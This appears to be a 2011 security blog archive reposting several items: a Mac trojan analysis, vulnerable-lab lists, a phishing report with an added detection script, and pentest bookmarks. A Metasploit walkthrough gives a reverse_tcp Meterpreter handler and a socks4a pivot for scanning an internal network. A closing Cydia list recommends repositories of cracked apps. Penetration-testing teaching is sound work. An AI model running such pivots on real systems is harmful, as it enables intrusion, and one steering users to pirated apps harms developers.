Feb 26, 2011

Mac OS X backdoor Trojan, now in beta?

It appears there is a new backdoor Trojan in town and it targets users of Mac OS X. As even the malware itself admits, it is not yet finished, but it could be indicative of more underground programmers taking note of Apple's increasing market share.
SophosLabs analyzed the sample we received and determined that it is a variant of a well-known remote-access trojan for Windows known as darkComet.
The Mac version is very basic and there appears to be a mix of German and English in the user interface. Its functions include:
* Placing text files on the desktop
* Sending a restart, shutdown or sleep command
* Running arbitrary shell commands
* Placing a full screen window with a message that only allows you to click reboot
* Sending URLs to the client to open a website
* Popping up a fake "Administrator Password" window to phish the target
Screenshot of fake Admin credentials dialog
Here is an excerpt from the default text that is displayed in the full screen window with the reboot button:
"I am a Trojan Horse, so i have infected your Mac Computer. I know, most people think Macs can't be infected, but look, you ARE Infected!
I have full controll over your Computer and i can do everything I want, and you can do nothing to prevent it.
So, Im a very new Virus, under Development, so there will be much more functions when im finished."
SophosLabs has published protection for our customers as OSX/MusMinim-A. Trojans like this are frequently distributed through pirated software downloads, torrent sites, or anywhere you may download an application expecting to need to install it.

It could also be dropped by a vulnerability in your browser, plugins and other applications. Patching is an important part of protection on all platforms.
Fortunately our products can detect and remove Trojans like this, and for home use they're free! If you would like to install Sophos Anti-Virus for Mac Home Edition, click on the banner below.
Download Sophos Anti-Virus for Mac Home Edition

Source: http://nakedsecurity.sophos.com/2011/02/26/mac-os-x-backdoor-trojan-now-in-beta/

Pentest lab vulnerable servers-applications list

In this post I’m going to present some useful resources for learning about penetration testing, and places to use exploitation tools and techniques in a safe and legal environment. This list contains a set of deliberately insecure LiveCDs and virtual machines designed to be used as targets for enumeration, web exploitation, password cracking and reverse engineering.

Similar to the De-ICE CDs and pWnOS, Holynix is an Ubuntu server VMware image that was deliberately built to have security holes for the purposes of penetration testing. It is more of an obstacle course than a real-world example.

WackoPicko is a website that contains known vulnerabilities. It was first used for the paper Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners found: http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf

De-ICE PenTest LiveCDs
The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test team at the company he worked for. Needing to learn as much about penetration testing as quickly as possible, Thomas began looking for both tools and targets. He found a number of tools, but no usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas created PenTest scenarios using LiveCDs.

Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.

Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications.

Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo

LAMPSecurity training is designed to be a series of vulnerable virtual machine images along with complementary documentation designed to teach Linux, Apache, PHP and MySQL security.

Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

This is the Hacking-Lab LiveCD project. It is currently in beta stage. The LiveCD is a standardized client environment for solving our Hacking-Lab wargame challenges remotely.

Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:

Damn Vulnerable Linux (DVL)
Damn Vulnerable Linux  is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.

pWnOS is a “VM image” that creates a target on which to practice penetration testing, with the “end goal” of getting root. It was designed for practicing the use of exploits, with multiple entry points.

Virtual Hacking Lab
A mirror of deliberately insecure applications and old software with known vulnerabilities. Used for proof-of-concept, security training and learning purposes. Available as virtual images, live ISOs or in standalone formats.

Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure.

Katana is a portable multi-boot security suite which brings together many of today’s best security distributions and portable applications to run off a single flash drive. It includes distributions which focus on pen-testing, auditing, forensics, system recovery, network analysis, and malware removal. Katana also comes with over 100 portable Windows applications, such as Wireshark, Metasploit, NMAP, Cain & Abel, and many more.

HACKXOR [webapp hacking game] 

Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism and difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc.



BodgeIt Store
A vulnerable web application which is currently aimed at people who are new to pen testing.



Exploit KB Vulnerability Web App.
This vulnerable web app was developed by NightRanger. It's good practice to develop a PHP-based site from scratch in order to learn the basics of PHP and MySQL, and it is a fully functional web site with a content management system. You can download it as a source code package or as a VMware image.

PuzzleMall is a vulnerable web application designed for training purposes.
It is prone to a variety of different session puzzle exposures, which can be detected and exploited using different session puzzling sequences.



Edit:: Update the link. Thank you Francisco Sáa Muñoz.
Update:  Add link and Add some to the list
Update 2011-05-23: Add puzzlemall and update broken link.

RSA Conference 2011 recap: What we learned

As most of our readers know, the RSA Conference is information security's biggest annual event, and it's a great bellwether for what's top of mind among enterprise infosec practitioners.
Typically, each conference has one prevalent theme: NAC, cloud security and APT are a few that we've seen in recent years. This year, no dominant theme emerged, which I think is an indicator that the security industry is in a transition period: enterprises are focused on restarting delayed security initiatives, many major vendors are focused inward on finishing or integrating recent acquisitions, and analysts are waiting to see which of the next crop of security startups will bear fruit.
Still, I thought it would be worth highlighting a handful of our most interesting takeaways, all of which you can read more about on our RSA Conference 2011 coverage page.

Signature-based antimalware ain't what it used to be: Signature-based antimalware, the cash cow for the big AV companies, isn't going away anytime soon, but the writing is on the wall in that "traditional" antivirus software is becoming less effective and, in turn, less important. It's time to start learning how to rely on better technologies, like heuristics, behavior-based detection and, yes, even whitelisting.

Microsoft smack in the middle of cyberwar campaigns: In my exclusive interview with Scott Charney, Microsoft's corporate vice president of Trustworthy Computing, he admitted the increasing number of nation-states seeking exploits in the software giant's wares to conduct Internet espionage contributed to Microsoft's record number of security bulletins in 2010. Even though Microsoft had no new security product announcements and a somewhat lower profile than usual at RSA, it was clear after my conversation with Charney that Microsoft is committed to being perceived as a leader and an innovator in information security, even if that means recognizing some unpleasant realities about today's threat landscape. 

Some talking about IPv6 security issues; few actually listening: What happens when you transition to a new Internet Protocol system that has exponentially more address space? Well, nobody really knows yet, but the smart money says there will be a host of security issues that many aren't thinking about, one of which will be that IP address blacklisting will get a whole lot harder. Some would go so far as to say it fundamentally breaks vulnerability assessment methodology as we know it today. These are complex issues, and as addresses begin to run out and IPv6 becomes the only alternative, I was surprised not to hear more widespread concern. 

How risky is my cloud?: Finally, there was still plenty of talk about cloud computing security, everything from contracts to compliance and virtualization. And, in case you missed it, we've consolidated all of our secure cloud coverage to our newest website, SearchCloudSecurity.com. Check it out.
One last note, if I had to put in my early wagers on the RSA Conference 2012 theme, it would be mobile device management. If, as somebody predicted, mobile attacks increase and data loss results, there will be a rapid rise in demand for security tools to manage, monitor and enforce policy on a variety of mobile platforms.

Microsoft's "Web Tracking Protection" submission accepted by the W3C

The W3C has accepted a submission from Microsoft on "Web Tracking Protection", and has now started the formal standardisation process, the next step in which will be a workshop at Princeton University on 28-29 April 2011. In a posting, the W3C states that due to significant public concern, the submission from Microsoft is timely, and that the "W3C had already decided to strengthen its focus on privacy."

That public concern focusses on behavioural targeting and other such techniques used by advertisers to compile profiles on users in order to serve precisely tailored advertising. Many advertising networks offer the option of opting out of such tracking and the submission from Microsoft is intended to develop a standardised framework for a more general ability to opt out of such tracking.
The submission suggests two parts to the standard: first, filter lists, which would enforce a user's privacy preferences "by preventing the user agent from making unwanted requests to web servers that track users"; and secondly, an HTTP header and DOM property indicating the user's preference which would be used by a web server if it is set up in order to respect the user's privacy. This second part is identical to a plan proposed by Mozilla, which has been a strong supporter of the Do Not Track approach favoured by the US Federal Trade Commission.
The W3C states that it hopes to build a broad consensus on this subject and hopes to involve a broad range of stakeholders in the development of the standard: web site operators, privacy advocates and "also those who make use of user tracking to provide their services." To this end, the W3C invites discussion and input concerning the workshop to public-privacy@w3.org. Interested parties can subscribe to this mailing list through public-privacy-request@w3.org. The corresponding mail archive can be accessed here.

Source: http://www.h-online.com/security/news/item/Microsoft-s-Web-Tracking-Protection-submission-accepted-by-the-W3C-1198023.html

Mass phishing on credit card services brand using fake SSL

In February, Symantec observed a mass phishing attack on a popular credit card services brand. There were a large number of phishing URLs in the attack, which were all secured using Secure Socket Layer (SSL). So what makes this phishing attack stand out from the rest?
Phishing websites that use SSL are uncommon and are typically seen in very small numbers. To create a phishing site that uses SSL, the phisher would either have to create a fake SSL certificate or attack a legitimate certificate to attain an encryption for the site. In both cases, Symantec has observed that phishing sites using SSL are less frequent. In this particular attack, there were over a hundred phishing URLs that used a fake SSL certificate. This was achieved by hosting the phishing site on one single IP address which resolved to several domain names. That is, although there were abundant URLs in the attack, they all resolved to a single IP address and contained the same webpage. The SSL certificate was an expired one, with its issue date of the year 2006 and an expiration date of 2007. The phisher’s primary motive behind creating an encrypted phishing site is to help the site appear authentic and to convince users that the site is safe.
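The pattern described above, many hostnames resolving to one IP address and all presenting the same expired certificate, can be checked for by clustering URL or proxy log entries. The following Python sketch is an added example, not part of the Symantec post; the hostnames, IP addresses, placeholder fingerprints and the `find_suspicious_clusters` helper are constructed for illustration.

```python
from collections import defaultdict
from datetime import date

# Constructed sample data (not taken from the Symantec post). One row per
# HTTPS URL seen in mail or proxy logs, plus the certificate the server sent:
# (hostname, resolved IP, cert fingerprint placeholder, cert name,
#  not_before, not_after)
OBSERVATIONS = [
    ("secure-login.cards-example.test", "203.0.113.10", "FP-AAAA",
     "old-shop.example", "2006-02-01", "2007-02-01"),
    ("verify.cards-example.test", "203.0.113.10", "FP-AAAA",
     "old-shop.example", "2006-02-01", "2007-02-01"),
    ("compte.carte-example.test", "203.0.113.10", "FP-AAAA",
     "old-shop.example", "2006-02-01", "2007-02-01"),
    # Legitimate shared hosting: valid wildcard certificate covers every host.
    ("www.bank-example.test", "198.51.100.7", "FP-BBBB",
     "*.bank-example.test", "2010-06-01", "2012-06-01"),
    ("mail.bank-example.test", "198.51.100.7", "FP-BBBB",
     "*.bank-example.test", "2010-06-01", "2012-06-01"),
    ("static.bank-example.test", "198.51.100.7", "FP-BBBB",
     "*.bank-example.test", "2010-06-01", "2012-06-01"),
    # A single neglected site with a lapsed certificate: noisy, not a cluster.
    ("blog.example", "192.0.2.44", "FP-CCCC",
     "blog.example", "2009-01-01", "2010-01-01"),
]


def name_matches(cert_name, host):
    """Compare a certificate name with a hostname.

    A leading '*' covers exactly one left-most label, so
    '*.bank-example.test' matches 'www.bank-example.test' but not
    'a.b.bank-example.test'.
    """
    pattern = cert_name.lower().split(".")
    labels = host.lower().split(".")
    if len(pattern) != len(labels):
        return False
    if pattern[0] == "*":
        return pattern[1:] == labels[1:]
    return pattern == labels


def find_suspicious_clusters(observations, seen_on, min_hosts=3):
    """Group hosts by (IP, certificate) and flag clusters whose shared
    certificate is outside its validity period or does not cover the hosts."""
    clusters = defaultdict(list)
    for host, ip, fingerprint, cert_name, not_before, not_after in observations:
        clusters[(ip, fingerprint)].append(
            (host, cert_name,
             date.fromisoformat(not_before), date.fromisoformat(not_after))
        )

    findings = []
    for (ip, fingerprint), rows in sorted(clusters.items()):
        hosts = sorted({row[0] for row in rows})
        # Same fingerprint means same certificate, so any row's metadata will do.
        _, cert_name, not_before, not_after = rows[0]

        reasons = []
        if not (not_before <= seen_on <= not_after):
            reasons.append(
                f"certificate valid {not_before} to {not_after}, seen {seen_on}"
            )
        uncovered = [h for h in hosts if not name_matches(cert_name, h)]
        if uncovered:
            reasons.append(
                f"{len(uncovered)} of {len(hosts)} hostnames not covered "
                f"by certificate name {cert_name!r}"
            )

        # Many names on one IP is normal for shared hosting; it only becomes
        # interesting when the certificate they share is also broken.
        if len(hosts) >= min_hosts and reasons:
            findings.append({"ip": ip, "fingerprint": fingerprint,
                             "hosts": hosts, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_clusters(OBSERVATIONS, seen_on=date(2011, 2, 15)):
        print(finding["ip"], finding["fingerprint"], len(finding["hosts"]), "hosts")
        for reason in finding["reasons"]:
            print("  -", reason)
```

The `min_hosts` threshold is a tuning assumption: set it low for a small mail gateway and higher where shared hosting with lapsed certificates is common.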

The phishing site spoofed a credit card services brand and targeted customers in Switzerland; its phishing pages were in French. End-users were also asked to provide login credentials of a popular e-commerce brand. Hence, phishers attempted to harvest confidential information of two brands with the same phishing attack. The phishing site was hosted on servers based in California, USA.
The phishing site asks for the confidential information in a two-step process. The first step is an identity verification of the user. Here, the user is asked to enter name, date of birth, address, email with password of the e-commerce brand, and mother’s maiden name. The second step asks for banking data including bank name, bank ID, name of card holder, card type, card number, personal code, card expiration date, and CVV number. Upon entering the requested information, the phishing site redirects to a blank webpage. If users fell victim to the phishing site, phishers would have stolen their information for financial gain.
Internet users are advised to follow best practices to avoid phishing attacks, such as:
  • Do not click on suspicious links in email messages.   
  • Avoid providing any personal information when answering an email.
  • Never enter personal information in a pop-up screen.
  • Frequently update your security software, such as Norton Internet Security 2011, which protects you from online phishing.

Source: http://www.symantec.com/connect/blogs/mass-phishing-credit-card-services-brand-using-fake-ssl

Feb 25, 2011

The Open Penetration Testing Bookmarks Collection

...is just that, a collection of handy bookmarks I initially collected that aid me in my day to day work or I find in the course of research. They are not all inclusive and some sections need to be parsed but they are all good reference materials. I find having this Hackery folder in Firefox an easy way to reference syntax, tricks, methods, and generally facilitate and organize research.
Opening it up to everyone will facilitate a knowledge transfer. Hopefully the initial set will grow and expand.

How it's working atm:

First off, we need help. OCD organizational people and people who can contribute or sort out the best links. Comment on the wiki if you wanna pitch in. Free beer at con's ;)
The whole bookmarks html file is ready for import to firefox off of the downloads section. As people submit new links we will add them and restructure the categories as they expand. Otherwise the wiki page should have all the links piecemeal should you not decide to download the whole folder (which is lame).

How to submit your bookmarks:

Since a bookmarks file is not really what you usually use a code repository for, we opted just to use the download and wiki sections of Google Code.
If you have suggestions or a few links to submit, leave a comment on the wiki page.
If you have a large set of bookmarks you think you can contribute, email us and we'll add you to the contributors section.

The general categories are:

Created for forums that will help in both tool usage, syntax, attack techniques, and collection of scripts and tools. Needs some help. I don't really frequent too many underground forums but I actually find nice one-off scripts and info I can roll into my own code in these places. Would like to add more.
Blogs Worth It:
What the title says. There are a LOT of pentesting blogs; these are the ones I monitor constantly and value in the actual day-to-day testing work.
OSINT Sites:
OSINT has become a huge part of the pentest methodology, from fueling social engineering to passively profiling your target infrastructure. There are subfolders for presentations on how-to, sites for profiling people and organizations, and sites for profiling technical assets. This section is doing okay atm.
Exploits and Advisories
Places to go for exploit descriptions, white-papers, and code. Needs work.
Exploitation Intro
If you'd like to get into exploit dev, these are really the guides and docs that will start you off in the right direction. Since Exploit dev is not my primary occupation this section could always use help.
Agile Hacking
Mostly collections of guides on non-tool command line hacking syntax. Heavily inspired by Ed Skoudis and PDP of GNUCitizen. Needs work.
Cheatsheets and fu!
Random cheatsheets for heavily used tools and reference. Need a lot of work.
*nix <3
Collection of *nix command line knowledge and distributions for pentesting. Needs work.
Open source classes relating to hacking and penetration testing. I would really like to find more of these.
Some practical and some high level methodologies for hacking related activities. Needs a lot of work.
If you want to practice your fu, these links to test sites, blogs about practice, and lab setup how-tos will help. Needs work; would like to convert to direct links as well.
Semi-parsed, nor has it really been inspected for relevancy. More of just a place I dump links for new tools and tools I use often. Needs a LOT of help, parsing, additions, etc.
Web Vectors
I do a lot of web stuff. Here are some web vectors and associated useful docs and cheatsheets on each of them. Could always use more in these sections.
Misc Sec
Not categorized, misc, and randomness.
It's not even parsed yet, nor has it really been inspected for relevancy. Needs lots of work.
Hacker Media
Needs additions to main pages of con video archives. It's an okay start though. Needs work.

Source: http://code.google.com/p/pentest-bookmarks/

Nessus Through SOCKS Through Meterpreter

Earlier this year Mark Baggett wrote an article on running a Nessus scan through Meterpreter. It involved installing an SSH server on the compromised machine and then using it as a SOCKS4 proxy to forward the scan traffic through to the target machine (Nessus Scanning through a Metasploit Meterpreter Session). It was a great idea but I don't like installing tools on clients' machines if I can avoid it, so never got round to doing it on a test.
Recently Zate Berg added the Nessus plug-in to Metasploit to let you control a Nessus server from the Metasploit command line. Without thinking it through my initial reaction was "Great I can now scan through a Meterpreter pivot". Once I thought about it and read Carlos's article New Nessus Plug-In For Metasploit I realised that the Nessus server was still running on the attacker machine and so didn't have access to the tunnel.
After asking a few questions on various mailing lists, egypt pointed me at the auxiliary/server/socks4a module which would allow me to do the same as the SSH server but without having to install anything on the compromised machine. After a bit of playing, some partially successful scans and more questions to the list I got a completed scan through a Meterpreter pivot. The key seems to be that you need to be running at least Ruby 1.9 (I'm running 1.9.1), not 1.8.7 as I originally tried; without it the proxy seems to get congested and locks up.
Below is a walk through of the steps I went through to get the scan. The actors in this play are:
  • - The attacking machine
  • - The compromised machine
  • - The machine I want to scan
There is no normal route from the 192 network into the 10 network, the router at prevents this.
robin@attacker metasploit $ ./msfconsole

< DigiNinja >
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 613 exploits - 309 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10774 updated today (2010.10.21)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-10-22 10:38:18 +0100

msf exploit(handler) > route add 1
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > 
Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.
root@attacker sbin # proxychains nc 445
ProxyChains-3.1 (http://proxychains.sf.net)
Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.
socks4 1080
And now start Nessus
root@attacker sbin # proxychains ./nessus-service -D 
Scans take a LONG time: with a default Nessus policy it took me 4242 seconds to scan the compromised machine, which is nearly an hour and a quarter, so I've created a minimal policy to work with for this type of scanning. First we load the nessus module, then connect to it, check the policies and finally fire off a scan.
msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect robin@localhost
[+] Password:
[*] Connecting to https://localhost:8834/ as robin
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List

ID  Name        Comments
--  ----        --------
4   Minimal MS
3   noping
2   Web
1   All

msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows"
[*] Creating scan from policy number 4, called "Quick Windows" and scanning
[*] Scan started.  uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans

Scan ID                                               Name           Owner  Started            Status   Current Hosts  Total Hosts
-------                                               ----           -----  -------            ------   -------------  -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee  Quick Windows  robin  12:39 Oct 22 2010  running  0              1

[*] You can:
[+]             Import Nessus report to database :      nessus_report_get <reportid>
[+]             Pause a nessus scan :                   nessus_scan_pause <scanid>
Now sit back for a LONG wait. You can check the status with nessus_scan_status
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans

Scan ID                                               Name           Owner  Started            Status   Current Hosts  Total Hosts
-------                                               ----           -----  -------            ------   -------------  -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee  Quick Windows  robin  12:39 Oct 22 2010  running  0              1
When it finally finishes you can check the results and load them into your Metasploit database
msf auxiliary(socks4a) > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file... 
[*] Successfully connected to the database
[*] File: msf.db                    

msf auxiliary(socks4a) >  nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*]   Done!                                           
[+] Done
msf auxiliary(socks4a) > db_hosts 


address        address6  arch  comm  comments  created_at               info  mac                name                          os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at               svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------               ----  ---                ----                          ---------  -------  -------  -----  -------  -----  ----------               ----  -----  ---------
                                       2010-10-22 14:09:22 UTC        00:13:3b:04:03:52  CORP_DC                                                                    alive  2010-10-22 14:09:22 UTC  5     6      default
So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.

Source: http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php

Feb 24, 2011

The Best Cydia Repository Sources / List

Whenever new jailbreak tools come out for jailbreaking iOS, many people get excited and can't stop playing with their iPhones. Wanting to get the most out of their iPhone or iPad, they look for jailbroken / Cydia apps to install to add features and capabilities to the iPhone. But some Cydia apps are hosted on Cydia repository sources other than the ones Cydia ships with. So where are the good Cydia sources? aPptUbe has put together a set of recommended Cydia repository sources worth adding to your device, especially suitable for newcomers with an iPhone 4 running iOS 4. They have been checked and work, and the sources are trustworthy, have been around for a long time, and are worth adding. (We recommend adding only the ones you need; don't add too many, or Cydia will get even slower.)
Hope you like it. If anyone has a great repo list to recommend, leave a comment.
How to add a repository source in Cydia
  • Open Cydia
  • Tap the Manage button at the bottom
  • Select Sources
  • Tap "Edit" at the top right
  • Tap "Add" and enter the URL of the repo
  • Tap Done
Cydia Repository Sources: Thai
  • Source: http://www.smart-mobile.com/cydia
For the Cydia apps discussed on the smart-mobile web board, including apps for Thai users such as the Thai mobile phone number database for MCallShow, the POI collection for the iGO for iPhone app, BKK Transit (information on mass transit systems such as the BTS, MRT and Chao Phraya Express Boat), and the nice themes shown off on the web board, as well as good foreign apps, some of which have also been cracked.
  • Source: iAppdev Thai Package http://iappdev.com/i
For the Thai keyboard for iPhone, iPod Touch and iPad, and the apps developed by Rainbows, the site's owner.
  • Source: http://www.iphoneinthailand.com/cydia/
Many of the Cydia apps that Thai users like are collected here, such as Thai Carrier logo (but it does not work with iOS4) and the MCallShow database of Thai phone numbers.
Cydia Repository Sources: International
  • Source: Hackulo.us http://cydia.hackulo.us
There isn't a lot here, but what is here is the good stuff, such as every version of "AppSync", an app that lets you sync DRM-locked apps with iTunes; installous, an app for installing apps and games directly on the iPhone; Hackulous Security; and MetaDataRemovr. For hackers, there are also several good tools here, such as a crack tool for cracking apps.
  • Source: SiNfuL iPhone Repo http://www.sinfuliphonerepo.com/
For cracked jailbroken / Cydia apps; many that are worth trying out are here. More information can be found on the web board.
  • Source: xSellize http://cydia.xsellize.com/
A huge collection of ringtones, some of them hard to find, and nice themes can be found here too. It is also a source for cracked jailbroken / Cydia apps, with many worth trying out. More information can be found on the web board.
  • Source: http://cydia.iphone.org.hk/apt
A source from Hong Kong, especially for iPhone game fans, because it collects patches for cheating in games (money, items and so on) for popular titles such as Battle Field, Fishing King, Fieldrunners, Need for Speed, Plants vs Zombies, The Sims 3, We Rule and Zenonia 2, as well as e-books of popular books such as Harry Potter.
  • Source: Hack Store http://cydia.myrepospace.com/HackStor/
For cracked jailbroken / Cydia apps; many that are worth trying out are here. More information can be found on the HackStore blog.
  • Source: http://ispaziorepository.com
A source from Italy, but it is another good collection of ringtones, lockscreens, SMS themes, themes and tweaks for the iPhone. More information is available on the blog, though it is in Italian (just use Google Translate).
  • Source: http://theiphonespotrepo.net/apt
For jailbroken / Cydia apps that have been cracked; many that you might want to try out are here. This repo source is updated with apps quickly, so new releases can be found here. More information can be found at The iPhone Spot.

Cydia Repository Sources for installing specific apps
  • Source: NERV Repository http://www.cmdshft.ipwn.me/apt/
For installing Push Doctor (a fix for push not working on hacktivated phones), Push Donor, and YouTube Fix.
  • Source: BENM.AT Repo http://repo.benm.at/
For installing Frash (Flash Player) and Frash Toggle. Instructions for installing Frash can be read here.
  • Source: iPhone Khmer http://iphonekhmer.com/
For installing Thai Keyboard 4 rows, by a developer from Cambodia: a four-row Thai keyboard, like a computer keyboard.
  • Source: iWooWiz http://repo.woowiz.net/
For installing the tools needed to jailbreak iOS 4.1 Spirit2pwn with sn0wbreeze 2.
  • Source: http://apps.iphoneislam.com/
For installing FaceIT-3GS, a tweak that lets an iPhone 3GS running iOS 4.1 use FaceTime over WiFi.
  • Source: http://cydia.myrepospace.com/iClick/ (latest!)
For installing iClick keyboard Thai for iOS4.x.
  • Source: http://repo.bingner.com (latest!)
For locked iPhones that need to be activated without using the Hacktivation method. Details can be read here.

Default Cydia repository sources that come with Cydia
  • Source: Big Boss http://apt.thebigboss.org/repofiles/cydia/
The source known for having the most apps, themes and ringtones. You can follow its news on the BigBoss Blog.
  • Source: ModMyi.com http://apt.modmyi.com/
Another large source; many good apps and themes can be found here. You can follow its news on the ModMyi web board.
  • Source: Ultrasn0w http://repo666.ultrasn0w.com
For unlock tools such as ultrasn0w.
  • Source: Telesphoreo Tangelo http://apt.saurik.com
Distributes Unix software for the iPhone; this is the source run by Cydia's own creator.
  • Source: ZodTTD & MacCiti http://cydia.zodttd.com/repo/cydia/
For Gameboy and PlayStation game emulators for the iPhone, plus themes and ringtones, this is the place.

Source: http://apptube.exteen.com/20100807/cydia-repository-source-list